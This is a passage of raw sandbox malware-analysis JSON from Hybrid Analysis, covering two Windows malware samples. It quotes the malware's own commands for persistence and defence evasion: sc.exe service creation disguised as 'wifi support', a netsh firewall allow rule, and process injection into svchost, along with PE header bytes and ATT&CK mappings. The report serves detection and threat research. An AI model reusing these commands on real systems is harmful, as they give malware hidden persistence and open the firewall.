"https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ulhofeim.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ulhofeim.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"ulhofeim.exe.67EE49C3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"ulhofeim.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\ulhofeim.exe]- [targetUID: 00000000-00002544]\n \"ULHOFEIM.EXE.67EE49C4.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" has section name .text with entropy \"6.630102803682182\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" has section name .text with entropy \"7.972855291312212\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" has section name .reloc with entropy \"6.221496050028631\"\n \"ulhofeim.exe\" has section name .text with entropy \"6.630102803682182\"\n \"ulhofeim.exe\" has section name .text with entropy \"7.972855291312212\"\n \"ulhofeim.exe\" has section name .reloc with entropy \"6.221496050028631\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00002544)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (UID: 00000000-00002544)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00003068)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ulhofeim.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00004276)\n Spawned process \"sc.exe\" with commandline \"create njrbicei binPath= \"%WINDIR%\\\\system32\\\\njrbicei\\\\ulhofeim.exe /d\\\\\"C:\\\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00003996)\n Spawned process \"sc.exe\" with commandline \"description njrbicei \"wifi internet conection\"\" (UID: 00000000-00002188)\n Spawned process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00002912)\n Spawned process \"ulhofeim.exe\" with commandline \"/d\"C:\\\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\"\" (UID: 00000000-00002944)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002340)\n Spawned process \"svchost.exe\" (UID: 00000000-00002972)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 248)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 248)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 248)\n \"ulhofeim.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"ulhofeim.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"ulhofeim.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"ulhofeim.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" allocated memory in \"C:\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"ulhofeim.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002944)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"ulhofeim.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00002912)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002340)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3
https://hybrid-analysis.com/sample/8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3
Hybrid Analysis - Um_unhooking
{"size": 1028096, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3", "sha256": "8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3", "av_detect": 78, "vx_family": "Fugrafa.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 275, "extracted_files": [{"name": "sqlsec.exe", "file_size": 1028096, "sha256": "8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe (PID: 4392)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "sqlsec.exe.bin", "file_size": 1028096, "sha256": "8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe (PID: 4392)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004392", "name": "8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe", "normalized_path": "C:\\8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe", "sha256": "8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 16}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 6}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 3}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 6, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Local Account", "attck_id": "T1136.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1136/001", "informative_identifiers_count": 1, "parent": {"technique": "Create Account", "attck_id": "T1136", "attck_id_wiki": "https://attack.mitre.org/techniques/T1136"}}, {"tactic": "Persistence", "technique": "Print Processors", "attck_id": "T1547.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/012", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Port Monitors", "attck_id": "T1547.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/010", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Device Registration", "attck_id": "T1098.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098/005", "informative_identifiers_count": 1, "parent": {"technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 6, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Print Processors", "attck_id": "T1547.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/012", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Process Doppelgänging", "attck_id": "T1055.013", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/013", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Port Monitors", "attck_id": "T1547.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/010", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Device Registration", "attck_id": "T1098.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098/005", "informative_identifiers_count": 1, "parent": {"technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", 